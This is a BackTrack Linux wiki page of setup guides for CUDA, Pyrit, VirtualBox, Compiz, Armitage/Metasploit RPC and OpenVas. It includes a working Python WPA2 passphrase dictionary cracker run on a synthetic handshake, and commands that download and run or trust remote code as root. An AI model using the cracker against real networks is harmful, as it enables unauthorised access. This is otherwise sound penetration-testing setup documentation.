Advanced Corner

From BackTrack Linux

This section is dedicated to interesting how-to's, various setups etc.

Pentesting VoIP

NightRang3r provided an excellent introductory writeup on Pentesting VoIP With BackTrack, covering the SIP protocol and a wide range of tools and techniques for attacking it.

Getting Cuda working on Backtrack 4

BackTrack includes many tools which use the power of graphics cards to greatly improve performance. This section will help you set up your environment to use these tools, and also to set up a development environment for building your own.

Check http://en.wikipedia.org/wiki/CUDA to see whether your video card is capable of running CUDA applications.

Installing the Nvidia Drivers

Installing the driver is now easier than ever. We package the installer from the NVIDIA web site and do not alter it in any way, so the nvidia-driver package builds its kernel module against whatever kernel you are running and should work on any BackTrack kernel version.

Note: Be sure to log out of X before installing the driver or it will fail

root@bt:~# apt-get install nvidia-driver

Simply follow the prompts and choose the defaults and you should be fine

Since every system is different there are 2 ways to get your xorg.conf working on backtrack.

Method 1: The installer attempts this itself, but in some cases it must be done manually. Log out of the X server, then:

root@bt:~# Xorg -configure
root@bt:~# cp /root/xorg.conf.new /etc/X11/xorg.conf
root@bt:~# startx

Method 2: NVIDIA bundles a configuration tool with its driver which may work better for you than the Xorg tool. Log out of the X server, then:

root@bt:~# nvidia-xconfig
root@bt:~# startx

Installing the CUDA Toolkit

The toolkit contains the nvcc compiler and all the libraries needed to build any GPU based applications from source. The toolkit is also needed if you are planning on developing any of your own applications.

root@bt:~# apt-get install cuda-toolkit

The default install is /opt/cuda

Note: The toolkit is packaged to be installed and used as root. If you want to use it as another user, add the following lines to that user's .bashrc, pointing at the /opt/cuda install location above:

PATH=$PATH:/opt/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib
export PATH
export LD_LIBRARY_PATH

Installing the Nvidia SDK

We no longer package the CUDA code samples in our repositories because of the size the package has grown to. The code samples are extremely useful if you are interested in CUDA development, though, and getting them installed on BackTrack is fairly simple.

root@bt:~# wget http://developer.download.nvidia.com/compute/cuda/3_1/sdk/gpucomputingsdk_3.1_linux.run
root@bt:~# chmod 755 gpucomputingsdk_3.1_linux.run
root@bt:~# ./gpucomputingsdk_3.1_linux.run

The only thing to change from the default choices is where the NVIDIA_SDK is installed. On BackTrack the toolkit lives in /opt, so install the samples to /opt/cuda/ to keep them inside the cuda directory. Note that this fetches an installer over plain HTTP and then runs it as root; compare the file against a checksum published by NVIDIA before executing it.

Getting up and running with Pyrit

Pyrit is included in the BackTrack ISO, but to use it with CUDA you also need its CUDA compute core, which ships in the cpyrit-cuda package. Installation is straightforward:

root@bt:~# apt-get install cpyrit-cuda

You can check if your GPU is being recognized with the following command:

root@bt:~# pyrit list_cores
Pyrit 0.3.1-dev (svn r279) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
The following cores seem available...
#1:  'CUDA-Device #1 'GeForce GTX 295
#2:  'CUDA-Device #2 'GeForce GTX 295
#3:  'CUDA-Device #3 'GeForce GTX 295
#4:  'CUDA-Device #4 'GeForce GTX 295
#5:  'CUDA-Device #5 'GeForce GTX 295
#6:  'CUDA-Device #6 'GeForce GTX 295
#7:  'CUDA-Device #7 'GeForce GTX 295
#8:  'CUDA-Device #8 'GeForce GTX 295


You can then run a benchmark to see how many PMKs (pairwise master keys, one per candidate passphrase) per second your system can compute:

root@bt:~# pyrit benchmark
Pyrit 0.3.1-dev (svn r279) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (97384.8 PMKs/s)... |
Computed 97384.83 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 295: 11520.5 PMKs/s (RTT 2.9)
#2: 'CUDA-Device #2 'GeForce GTX 295: 11274.3 PMKs/s (RTT 2.9)
#3: 'CUDA-Device #3 'GeForce GTX 295: 10439.3 PMKs/s (RTT 2.9)
#4: 'CUDA-Device #4 'GeForce GTX 295: 11095.7 PMKs/s (RTT 2.9)
#5: 'CUDA-Device #5 'GeForce GTX 295: 10564.8 PMKs/s (RTT 2.6)
#6: 'CUDA-Device #6 'GeForce GTX 295: 10533.7 PMKs/s (RTT 2.9)
#7: 'CUDA-Device #7 'GeForce GTX 295: 10414.8 PMKs/s (RTT 2.6)
#8: 'CUDA-Device #8 'GeForce GTX 295: 11333.7 PMKs/s (RTT 2.9)
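To make concrete what the PMKs/s figure above measures, here is an added example (not Pyrit's code and not part of the original page) that does the same work in plain Python: derive the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, salted with the SSID), expand it to a PTK, and check a candidate passphrase against the MIC of a captured EAPOL frame. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed for the demo; the only external value is the 802.11i test vector (passphrase "password", SSID "IEEE") that confirms the PMK derivation. Two points the benchmark alone does not show: the 4096 HMAC rounds per candidate are why GPU offload matters (at the roughly 97k PMKs/s above, a ten-million-word list takes under two minutes), and because the SSID is the salt, a table of precomputed PMKs is only valid for one network name.

```python
"""WPA2-PSK candidate check: the work behind Pyrit's PMKs/s figure.

Added example for this page, not Pyrit's own code. All handshake material
(SSID, MACs, nonces, EAPOL frame, wordlist) is constructed for the demo.
"""
import hashlib
import hmac

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# version(1) type(1) length(2) descriptor(1) key info(2) key length(2)
# replay counter(8) nonce(32) IV(16) RSC(8) ID(8) = 81 bytes before the MIC.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """802.11i PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID.

    4096 iterations of HMAC-SHA1 per candidate is the cost Pyrit moves to the
    GPU, and the SSID salt is why precomputed PMK tables fit one ESSID only.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """Expand the PMK to a PTK and return the KCK (first 128 bits), which keys the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, frame):
    """WPA2/CCMP (key descriptor version 2) MIC: HMAC-SHA1 over the frame with its MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """Return the first passphrase whose derived KCK reproduces the captured MIC, else None."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, handshake["ssid"])
        kck = derive_kck(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return word
    return None


def build_sample_handshake(passphrase="correct horse", ssid="DemoNet"):
    """Construct a synthetic 4-way handshake message 2 authenticated with `passphrase`."""
    ap_mac = bytes.fromhex("001122334455")   # constructed AP address
    sta_mac = bytes.fromhex("66778899aabb")  # constructed client address
    anonce = bytes(range(32))                # constructed nonces
    snonce = bytes(range(32, 64))
    # EAPOL v1, Key frame, body length 0x5f, RSN descriptor, key info 0x010a
    # (pairwise | MIC | descriptor version 2), key length 16, replay counter 1.
    header = (bytes.fromhex("0103005f02010a0010") + (1).to_bytes(8, "big")
              + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8)
    frame = header + b"\x00" * 16 + b"\x00\x00"  # zeroed MIC, key data length 0
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": frame, "mic": mic}


if __name__ == "__main__":
    hs = build_sample_handshake()
    print(crack(hs, ["password", "letmein", "correct horse", "12345678"]))
```

Each call to pmk_from_passphrase is one "PMK" in Pyrit's counter; everything after it (PRF-512 and one HMAC over the frame) is cheap by comparison, which is why the PMK step is the one worth precomputing or offloading to the GPU.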

Add CUDA syntax highlighting to Vim

I like to use Vim for coding so here is how to add CUDA syntax highlighting to Backtrack


First we need to install vim-full:

root@bt:~# apt-get install vim-full

Then grab the syntax file:

root@bt:~# cd /usr/share/vim/vim71/syntax/
root@bt:/usr/share/vim/vim71/syntax# wget http://www.backtrack-linux.org/patches/cu.vim.txt
root@bt:/usr/share/vim/vim71/syntax# mv cu.vim.txt cu.vim

Next, change to your home directory (/root, or the home directory of whichever user you are using):

root@bt:~# touch .vimrc
root@bt:~# vi .vimrc

Add the following lines:

au BufNewFile,BufRead *.cu set ft=cu
syntax on

Vim is now set up for CUDA syntax highlighting.


Installing Virtual Box on Backtrack 4 R2

It should be noted that adding third-party repositories to any distribution can cause problems. That being said, many of us have downloaded and installed VirtualBox using this method without any problems.

Downloading and Installing

Add the repository to your sources list (BackTrack 4 R2 is built on Ubuntu 8.10, hence the intrepid suite):

root@bt:~# echo "deb http://download.virtualbox.org/virtualbox/debian intrepid non-free" >> /etc/apt/sources.list

Download Oracle's repository signing key and add it to apt's trusted keyring. Everything signed by this key will be installed as root, and the key itself arrives over plain HTTP, so check its fingerprint (gpg --with-fingerprint on the saved file) against the one Oracle publishes before adding it. You are already root, so sudo is unnecessary:

root@bt:~# wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | apt-key add -
OK

Update your system

root@bt:~# apt-get update

Install Virtual Box

root@bt:~# apt-get install virtualbox-3.1

What to do when apt-get update reports "GPG error: ... The following signatures were invalid"

The cached package lists are usually stale or corrupt. Clear them and fetch fresh copies (you are already root, so sudo is unnecessary); do not work around the error by disabling signature checking:

root@bt:~# apt-get clean
root@bt:~# rm -rf /var/lib/apt/lists/*
root@bt:~# mkdir /var/lib/apt/lists/partial
root@bt:~# apt-get update

If you have completed the steps properly you should now be able to launch Virtual Box from the System section of the KDE menu


Installing BackTrack and guest additions in Virtual Box

Download and check the BackTrack iso following this guide

http://www.backtrack-linux.org/wiki/index.php/Downloading

Install BackTrack following this guide

http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk

Once BackTrack is installed

Install Virtual Box guest additions in BackTrack

Install the latest dkms package from the BackTrack repository (the Guest Additions kernel modules are built against your running kernel):

root@bt:~# apt-get update
root@bt:~# apt-get upgrade
root@bt:~# apt-get install dkms

Then

root@bt:~# mount /dev/hdX /mnt/cdrom
root@bt:~# cd /mnt/cdrom
root@bt:~# ./VBoxLinuxAdditions-x86.run

where /dev/hdX is replaced by the device node assigned to the Guest Additions CD image after you attach it from the VirtualBox Devices menu (check dmesg if unsure).

Follow any onscreen instructions.

Once completed.

root@bt:~# reboot

Now we should check that the guest additions have installed correctly.

So run

root@bt:~# /usr/bin/VBoxClient-all

Then check that the services have started correctly

root@bt:~# ps ax |grep VBoxClient
 6351 ?        Sl     0:00 /usr/bin/VBoxClient --clipboard
 6355 ?        Sl     0:01 /usr/bin/VBoxClient --display
 6356 ?        Sl     0:01 /usr/bin/VBoxClient --seamless
 6404 pts/1    S+     0:01 grep VBoxClient
root@bt:~#

Where you should see output similar to that shown above.

Now we need to make the clients start automatically with the X session. Edit /root/.xinitrc:

root@bt:~# nano /root/.xinitrc

and add this line before the line that starts KDE (if that line is "exec startkde", nothing placed after it ever runs). VBoxClient-all launches its clients in the background and returns, so do not prefix it with exec, or the desktop would never start:

/usr/bin/VBoxClient-all

^O to save the changes to the file

^X to exit nano

Finally we should now restart our virtual machine just to make sure all the guest additions and the autostart of the services are working correctly.

root@bt:~# reboot

Enjoy your BackTrack Virtual Box install with all of the Guest additions fully working.


Installing VMware Workstation with BackTrack as the Host OS

The latest VMware Workstation (at the time of writing VMware-Workstation-Full-7.1.3-324285.i386.bundle) installs flawlessly on the latest BackTrack 4 R2 kernel (2.6.35.8).

It is a simple case of running the ./VMware-Workstation-Full-7.1.3-324285.i386.bundle and then following the directions in the GUI that pops up.

The VMware programs can then be found in the KDE menu > System.


Installing Compiz-Fusion on Backtrack 4 R2

Compiz-Fusion can add some really nice graphics and effects to your BackTrack installation. We do not include it by default, but it can be added fairly easily. Keep in mind these programs can be resource intensive, so be sure you have adequate RAM and CPU/GPU capacity. You will also need compositing enabled in xorg.conf and a supported graphics card.

Downloading and Installing

Download the following packages.

root@bt:~# apt-get install compiz compiz-fusion-plugins-extra compiz-fusion-plugins-unsupported emerald simple-ccsm fusion-icon

Go to backtrack menu -> system -> compiz fusion Right click the Compiz-Fusion icon and select "Reload Window Manager"

Adding compiz to startup

The package names above are not commands, and /etc/rc.local runs at boot with no X display, so listing them there does nothing useful. Start fusion-icon from your X session instead; it launches compiz and the emerald decorator for you. Edit /root/.xinitrc (or the .xinitrc of whichever user you use) and add this line before the line that starts KDE (if that line is "exec startkde", anything placed after it never runs):

fusion-icon &

Log out of X and run startx again; the Compiz-Fusion tray icon appears and Compiz starts with the session.

Armitage Setup

To install Armitage in BackTrack, we simply need to update the repositories and install the "armitage" package.

root@bt:~# apt-get update
...snip...
Reading package lists... Done
root@bt:~# apt-get install armitage
...snip...
Unpacking armitage (from .../armitage_0.1-bt0_i386.deb) ...
Setting up armitage (0.1-bt0) ...
root@bt:~#


Armitage communicates with Metasploit through the RPC daemon, so we start that next. Note what this command does: it listens on every interface (0.0.0.0:55553) with the password "test", so anyone who can reach that port and guess the password gets a Metasploit session running as root. On a single machine bind it to loopback with -a 127.0.0.1 and choose a real password; on a shared network, firewall the port as well.

root@bt:~# msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...


Next, we need to start the MySQL server so Armitage has a place to store its results.

root@bt:~# /etc/init.d/mysql start
Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
root@bt:~#


Lastly, we need to run "armitage.sh" from the /pentest/exploits/armitage directory at which point, we are presented with the connection dialog.

root@bt:~# cd /pentest/exploits/armitage
root@bt:/pentest/exploits/armitage# ./armitage.sh


(Screenshot: Armitage connect dialog)


We select the "Use SSL" checkbox, verify the rest of the settings and click "Connect". Afterwards, the main Armitage window is displayed.

(Screenshot: Armitage main window after launch)

For more information on Armitage and Metasploit usage, be sure to check out our free Metasploit Unleashed training course.


Getting started with OpenVas

This guide will show you how to set up OpenVas so that you can use it properly. Since the easiest way to use OpenVas is through the GUI, we will need to start the X server.

Adding a user to OpenVas

The first thing we want to do is add a user for our OpenVas scanner. You can add as many as you need, but we will only focus on adding one.


(Screenshot: OpenVas Add User menu entry)


Clicking the menu entry brings up a console where you create the user; alternatively, run "openvas-adduser" from a console. Here we define a user named "test".


Hitting Enter at the Authentication prompt accepts the default, password authentication.

  Using /var/tmp as a temporary file holder.
  Add a new openvassd user
  ---------------------------------
  Login : test
  Authentication (pass/cert) [pass] : 
  Login password : 
  Login password (again) : 
  User rules
  ---------------
  openvassd has a rules system which allows you to restrict the hosts that test has the right to test.
  For instance, you may want him to be able to scan his own host only.
  Please see the openvas-adduser(8) man page for the rules syntax.
  Enter the rules for this user, and hit ctrl-D once you are done:
  (the user can have an empty rules set)
  Login             : test
  Password          : ***********
  Rules             : 
  Is that ok? (y/n) [y] y
  user added.
  root@bt:~#


Once you are satisfied with your user account select 'y' to create it and return to the shell.
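An empty rules set, as in the transcript above, lets the account scan any host the scanner can reach. If the account is for a single engagement, constrain it at the rules prompt. As an added example (not part of the original page; the network range is constructed for illustration), these two rules permit one subnet and deny everything else:

```text
accept 192.168.1.0/24
default deny
```

Rules are matched in order and the default line applies to anything not matched above it; see openvas-adduser(8) for the full syntax.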

Creating a Certificate

When adding a user to OpenVas you have the option of password or certificate authentication. Before certificates can be used, the scanner itself needs an SSL certificate, which is what openvas-mkcert creates: a local CA plus the server certificate and key that the client uses to authenticate the scanner when connecting over SSL. You can run it through the menu system (OpenVas Make Cert) or from a console with "openvas-mkcert". Issuing a per-user certificate is a separate step not covered here.

Note: You do not need to do this step in order to use OpenVas with password authentication.


Hitting Enter at each prompt accepts the defaults.

  -------------------------------------------------------------------------------
  Creation of the OpenVAS SSL Certificate
  -------------------------------------------------------------------------------
  This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
  Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the 
  ability to connect to your OpenVAS daemon will be able to retrieve this information.
  
  CA certificate life time in days [1460]:  
  Server certificate life time in days [365]: 
  Your country (two letter code) [DE]: 
  Your state or province name [none]: 
  Your location (e.g. town) [Berlin]: 
  Your organization [OpenVAS Users United]:
  -------------------------------------------------------------------------------
  Creation of the OpenVAS SSL Certificate
  -------------------------------------------------------------------------------
  Congratulations. Your server certificate was properly created.
  /usr/local/etc/openvas/openvassd.conf updated
  The following files were created:
  . Certification authority:
     Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
     Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem
  . OpenVAS Server : 
      Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
      Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem
  Press [ENTER] to exit
  root@bt:~#

Synchronize OpenVas NVTs

Now that we have a user for OpenVas, you need to synchronize the NVTs (Network Vulnerability Tests), the plugins the scanner runs against its targets.


(Screenshot: OpenVas NVT Sync menu entry)


Again, clicking the menu entry launches a console and starts the synchronization. This may take quite a bit of time depending on your machine and network and on the number of NVTs to sync.


(Screenshot: NVT synchronization output)


Upon completion the console will return to the prompt. Once it does exit it.


Start Openvas Scanner

Now that you have synchronized the NVT database you can start the Openvas scanner. In the console it's "openvassd".


(Screenshot: Start OpenVas Scanner menu entry)


Starting the scanner may take some time, as it loads the NVTs. Once it has finished you should see the following.


(Screenshot: scanner output once all plugins are loaded)


Start OpenVas Client and connect to Scanner

There are two ways to run OpenVas: the GUI client and the command line interface. Which one you use depends on your needs. From the menu, select OpenVas Client; in a console it is "OpenVAS-Client". Once the client starts up, connect it to the scanner and enter the user credentials you created above.


(Screenshot: OpenVas Client connect dialog)


(Screenshot: client logon dialog)


If you created a certificate then you can supply it here as well.


(Screenshot: SSL setup dialog)


Note: Once you click on "ok" the client will load the plugins and this may take some time to complete. When all of the plugins are loaded the pop-up will let you know this and ask you to select "ok".


(Screenshot: connecting to localhost while plugins load)


After hitting "ok" you will be logged onto the client and connected to the scanner.


(Screenshot: client after connecting to the scanner)